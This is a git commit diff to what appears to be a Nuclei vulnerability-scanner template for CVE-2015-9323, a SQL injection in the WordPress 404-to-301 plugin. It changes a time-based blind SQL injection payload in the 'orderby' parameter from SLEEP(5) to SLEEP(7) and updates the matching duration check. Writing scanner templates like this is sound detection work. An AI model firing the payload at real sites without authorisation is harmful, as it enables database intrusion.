Update CVE-2015-9323.yaml

patch-1
J4vaovo 2024-02-06 23:42:37 +08:00 committed by GitHub
parent 6724dfe880
commit b8825acdb1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 3 deletions

View File

@ -39,15 +39,15 @@ http:
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
@timeout: 15s
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(7))XXX)--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'duration>=7'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "404-to-301")'
condition: and
# digest: 4b0a00483046022100b28bb71358fab3b1b7c6bb682de7e41c4bf6217c38d125c5634581a645e66e71022100982437043f6c4678cb0367a881a84c93fd92d7e81bd41877c4b8f8d93a207d69:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100b28bb71358fab3b1b7c6bb682de7e41c4bf6217c38d125c5634581a645e66e71022100982437043f6c4678cb0367a881a84c93fd92d7e81bd41877c4b8f8d93a207d69:922c64590222798bb761d5b6d8e72950